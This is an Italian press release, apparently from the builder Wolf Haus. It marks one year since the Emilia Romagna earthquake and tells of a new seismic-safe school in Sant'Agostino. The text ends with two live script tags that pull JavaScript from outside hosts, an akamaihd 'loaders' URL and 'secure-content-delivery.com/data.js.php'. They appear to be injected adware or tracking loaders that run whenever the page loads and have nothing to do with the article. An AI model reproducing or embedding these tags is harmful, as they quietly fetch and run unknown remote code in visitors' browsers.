Un anno fa ilterremoto che sconvolse l'Emilia Romagna ha aperto una ferita profonda in un territorio che da sempre è la culla dell'accoglienza e il cuore pulsante dell'economia italiana. Dopo pochi giorni Wolf Haus, insieme all'Associazione RiLAQUILA, si è recata immediatamente a portare un sostegno concreto alle popolazioni colpite, e lì ha trovato una comunità desiderosa di rinascere dalle macerie. Con una grande collaborazione tra le istituzioni, e grazie al coinvolgimento di Mediafriends Onlus, Il Resto del Carlino e il TG5, in pochissimi mesi abbiamo realizzato la prima scuola definitiva costruita dopo il terremoto: una struttura unica anche per essere la prima ScuolaEnergyPiù realizzata in Italia.
Questa scuola, realizzata a Sant'Agostino, uno dei centri maggiormente devastati dal sisma, rappresenta una nuova alba per una terra che ha trovato subito la forza di rialzarsi e tornare a vivere. Con la nuova Scuola EnergyPiù, dare una certezza alla formazione, e quindi al futuro dei ragazzi, significa per tante famiglie avere la serenità e la sicurezza per il futuro dei propri figli.
In occasione di questo anniversario il nostro pensiero e tutta la nostra solidarietà è per chi ha perso la vita, e per coloro i quali hanno ancora la propria abitazione distrutta o lesionata: per questo vogliamo ribadire con fermezza l'importanza di costruire ogni casa, scuola, azienda, ufficio con i migliori criteri di sicurezza sismica, poiché la vita di ogni persona, per chi costruisce, deve essere la priorità assoluta.
Con il nostro impegno e la passione che da sempre caratterizza la nostra mission, continueremo a sostenere l'Emilia, la sua gente e le istituzioni locali in quella che può, e deve essere, una ricostruzione sicura e sostenibile.
LINK: http://www.wolfhaus.it/index.php?id=6931
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>